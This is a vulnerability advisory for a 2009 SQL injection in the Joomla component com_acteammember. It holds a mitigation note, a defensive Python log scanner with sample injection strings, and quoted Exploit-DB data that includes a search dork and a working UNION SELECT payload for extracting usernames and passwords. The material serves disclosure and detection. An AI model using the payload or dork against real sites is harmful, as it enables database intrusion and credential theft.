Vendor: com_acteammember
By: altbta
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: com_acteammember
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2009

Joomla Component com_acteammember SQL Injection Vulnerability

An attacker can exploit this vulnerability by placing SQL in the vulnerable 'id' parameter of the URL. The injected query can be used to extract sensitive information from the database, such as usernames and passwords.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries.
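
To make the validation rule concrete, here is an added example (not part of the original advisory or the component's code) that applies it to web-server access logs: it flags `com_acteammember` requests whose `id` is not a plain integer. The log lines are constructed, and the 1-to-10-digit rule for `id` is an assumption about the component.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format (documentation IP ranges).
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Mar/2009:10:01:02 +0000] "GET /index.php?option=com_acteammember&id=7&Itemid=121&lang=en HTTP/1.1" 200 5120',
    '198.51.100.9 - - [12/Mar/2009:10:01:09 +0000] "GET /index.php?option=com_acteammember&id=-1+UNION+SELECT+1,2+from+mos_users--&Itemid=121 HTTP/1.1" 200 4800',
    '198.51.100.9 - - [12/Mar/2009:10:01:15 +0000] "GET /index.php?option=com_acteammember&id=7%27&Itemid=121 HTTP/1.1" 500 312',
    '203.0.113.5 - - [12/Mar/2009:10:02:40 +0000] "GET /index.php?option=com_content&id=12:about-us&Itemid=2 HTTP/1.1" 200 9000',
    '198.51.100.9 - - [12/Mar/2009:10:03:01 +0000] "GET /index.php?option=com_acteammember&id=3&id=4 HTTP/1.1" 200 4100',
    '203.0.113.5 - - [12/Mar/2009:10:03:30 +0000] "GET /index.php?option=com_acteammember&Itemid=121 HTTP/1.1" 200 5000',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INT_ID_RE = re.compile(r"[0-9]{1,10}")  # assumed rule: id is a plain record number


def check_request(target):
    """Return a reason string if the request breaks the id rule, else None."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if "com_acteammember" not in query.get("option", []):
        return None  # other components have their own id formats
    ids = query.get("id", [])  # parse_qs has already decoded %xx and '+'
    if len(ids) > 1:
        return "repeated id parameter"
    if ids and not INT_ID_RE.fullmatch(ids[0]):
        return "non-integer id: %r" % ids[0]
    return None


def scan(lines):
    """Return (line_number, client, reason) for every offending log line."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        reason = check_request(match.group(1)) if match else None
        if reason:
            findings.append((number, line.split()[0], reason))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer rule, enforced in the component before the value reaches the query, is the input validation the mitigation calls for.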

Exploit-DB raw data:

Joomla Component com_acteammember Sql Injection Vulnerability
==============================================================

####################################################################
.:. Author : altbta [l_9@hotmail.com]
.:. Home : www.v4-team.com/cc
.:. Dork : inurl:"com_acteammember"

####################################################################

===[ Exploit ]===

www.site.com/index.php?option=com_acteammember&id=[SQL]&Itemid=121&lang=en


http://server/index.php?option=com_acteammember&id=-1+UNION+SELECT+1,2,3,4,5,concat(username,0x20,password),7,8,9,10,11,12,13,14,15+from+mos_users--&Itemid=121&lang=en


####################################################################
Greats T0: aB0-3tH4b T3rR0r & RxH
Thanks T0: AtT4CKxT3rR0r1ST